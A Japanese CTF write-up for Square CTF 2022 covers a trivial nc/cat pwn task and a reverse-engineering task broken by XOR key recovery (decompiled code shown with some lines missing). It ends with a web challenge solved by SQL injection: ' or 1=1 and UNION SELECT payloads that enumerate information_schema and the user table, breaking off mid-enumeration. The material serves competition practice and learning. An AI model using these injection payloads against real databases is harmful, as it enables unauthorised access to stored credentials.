Square CTF 2022 Writeup

この大会は2022/11/19 10:00(JST)~2022/11/20 10:10(JST)に開催されました。

Pulse Check (pulse-check 1)



EZ pwn 1 (ez-pwn 50)


$ nc chals.2022.squarectf.com 4100
Hi! would you like me to ls the current directory?
Ok, here ya go!

ls -l
total 16
-r-xr-x--- 1 root pwnable_user 8528 Nov  6 21:09 ez-pwn-1
drwxr-xr-x 1 root pwnable_user 4096 Nov  9 04:49 the_flag_is_in_here
ls -l the_flag_is_in_here
total 4
-r--r----- 1 root pwnable_user 64 Nov  6 21:09 flag.txt
cat the_flag_is_in_here/flag.txt

EZ RE 1 (ez-re 100)


undefined8 main(void)

  int iVar1;
  char *__s2;
  long in_FS_OFFSET;
  undefined local_15 [5];
  long local_10;
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
      "I\'ve got this encrypted blob, and a mysterious encrypt/decrypt function I was told its milit ary grade encryption so I don\'t think I can crack it. Would you happen to know the key?:"
  puts("Alright, lets try that out...");
  __s2 = (char *)militaree_grayd_deekrypshun(local_15,flag_arr,5,0x3f);
  iVar1 = strncmp("flag{",__s2,5);
  if (iVar1 == 0) {
    puts("Hey, that looks right!");
        "There was also this weird other encrypted blob, but its so big that I don\'t want to touch  it. Feel free to decrypt it yourself though, i\'m pretty sure it uses the same key and algor ithm!\n"
  else {
    puts("No, that doesn\'t look right.");
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
  return 0;

void militaree_grayd_deekrypshun
               (undefined8 param_1,undefined8 param_2,undefined4 param_3,undefined4 param_4)


void * militaree_grayd_enkrypshun(long param_1,long param_2,int param_3,int param_4)

  void *pvVar1;
  int local_18;
  int local_14;
  pvVar1 = malloc((long)param_4);
  for (local_18 = 0; local_18 < param_4; local_18 = local_18 + param_3) {
    for (local_14 = 0; (local_14 < param_3 && (param_4 != local_14 + local_18));
        local_14 = local_14 + 1) {
      *(byte *)((long)pvVar1 + (long)(local_14 + local_18)) =
           *(byte *)(param_1 + local_14) ^ *(byte *)(param_2 + (local_14 + local_18));
  return pvVar1;

                             flag_arr                                        XREF[2]:     Entry Point(*), main:001008b1(*)  
        00301020 0a 03 0d        undefine
                 1f 1f 18 
                 07 09 27 
           00301020 0a              undefined10Ah                     [0]                               XREF[2]:     Entry Point(*), main:001008b1(*)  
           00301021 03              undefined103h                     [1]
           00301022 0d              undefined10Dh                     [2]
           00301023 1f              undefined11Fh                     [3]
           00301024 1f              undefined11Fh                     [4]
           00301025 18              undefined118h                     [5]
           00301026 07              undefined107h                     [6]
           00301027 09              undefined109h                     [7]
           00301028 27              undefined127h                     [8]
           00301029 02              undefined102h                     [9]
           0030102a 19              undefined119h                     [10]
           0030102b 01              undefined101h                     [11]
           0030102c 0f              undefined10Fh                     [12]
           0030102d 0c              undefined10Ch                     [13]
           0030102e 0d              undefined10Dh                     [14]
           0030102f 03              undefined103h                     [15]
           00301030 01              undefined101h                     [16]
           00301031 33              undefined133h                     [17]
           00301032 16              undefined116h                     [18]
           00301033 05              undefined105h                     [19]
           00301034 01              undefined101h                     [20]
           00301035 0a              undefined10Ah                     [21]
           00301036 1f              undefined11Fh                     [22]
           00301037 27              undefined127h                     [23]
           00301038 05              undefined105h                     [24]
           00301039 1e              undefined11Eh                     [25]
           0030103a 0a              undefined10Ah                     [26]
           0030103b 33              undefined133h                     [27]
           0030103c 19              undefined119h                     [28]
           0030103d 3b              undefined13Bh                     [29]
           0030103e 0f              undefined10Fh                     [30]
           0030103f 00              undefined100h                     [31]
           00301040 01              undefined101h                     [32]
           00301041 15              undefined115h                     [33]
           00301042 11              undefined111h                     [34]
           00301043 18              undefined118h                     [35]
           00301044 0e              undefined10Eh                     [36]
           00301045 18              undefined118h                     [37]
           00301046 11              undefined111h                     [38]
           00301047 12              undefined112h                     [39]
           00301048 09              undefined109h                     [40]
           00301049 30              undefined130h                     [41]
           0030104a 1c              undefined11Ch                     [42]
           0030104b 0a              undefined10Ah                     [43]
           0030104c 0b              undefined10Bh                     [44]
           0030104d 1c              undefined11Ch                     [45]
           0030104e 0a              undefined10Ah                     [46]
           0030104f 1e              undefined11Eh                     [47]
           00301050 0c              undefined10Ch                     [48]
           00301051 1d              undefined11Dh                     [49]
           00301052 33              undefined133h                     [50]
           00301053 05              undefined105h                     [51]
           00301054 03              undefined103h                     [52]
           00301055 13              undefined113h                     [53]
           00301056 01              undefined101h                     [54]
           00301057 33              undefined133h                     [55]
           00301058 08              undefined108h                     [56]
           00301059 09              undefined109h                     [57]
           0030105a 0c              undefined10Ch                     [58]
           0030105b 3b              undefined13Bh                     [59]
           0030105c 05              undefined105h                     [60]
           0030105d 1b              undefined11Bh                     [61]
           0030105e 11              undefined111h                     [62]
        0030105f 00              ??         00h


#!/usr/bin/env python3

flag_arr = [0x0a, 0x03, 0x0d, 0x1f, 0x1f]
flag = b'flag{'

inp = ''
for i in range(5):
    inp += chr(flag[i] ^ flag_arr[i])


$ ./ez-re-1_elf 
I've got this encrypted blob, and a mysterious encrypt/decrypt function I was told its military grade encryption so I don't think I can crack it. Would you happen to know the key?:
Alright, lets try that out...
Hey, that looks right!
There was also this weird other encrypted blob, but its so big that I don't want to touch it. Feel free to decrypt it yourself though, i'm pretty sure it uses the same key and algorithm!

Alex Hanlon Has The Flag! (web 50)


・' or 1=1 #
 →Sorry, admin is the wrong user

・' union select 'alex' #
 →Sorry, alex is the wrong user

・' union select 'hanlon' #
 →Sorry, hanlon is the wrong user

・' union select schema_name from information_schema.schemata limit 0, 1 #
 →Sorry, information_schema is the wrong user

・' union select schema_name from information_schema.schemata limit 1, 1 #
 →Sorry, performance_schema is the wrong user

・' union select schema_name from information_schema.schemata limit 2, 1 #
 →Sorry, appdb is the wrong user

・' union select table_name from information_schema.tables where table_schema = 'appdb' limit 0, 1 #
 →Sorry, user is the wrong user

・' union select column_name from information_schema.columns where table_name = 'user' limit 0, 1 #
 →Sorry, password is the wrong user

・' union select column_name from information_schema.columns where table_name = 'user' limit 1, 1 #
 →Sorry, username is the wrong user

・' union select username from user limit 0, 1 #
 →Sorry, admin is the wrong user

・' union select username from user limit 1, 1 #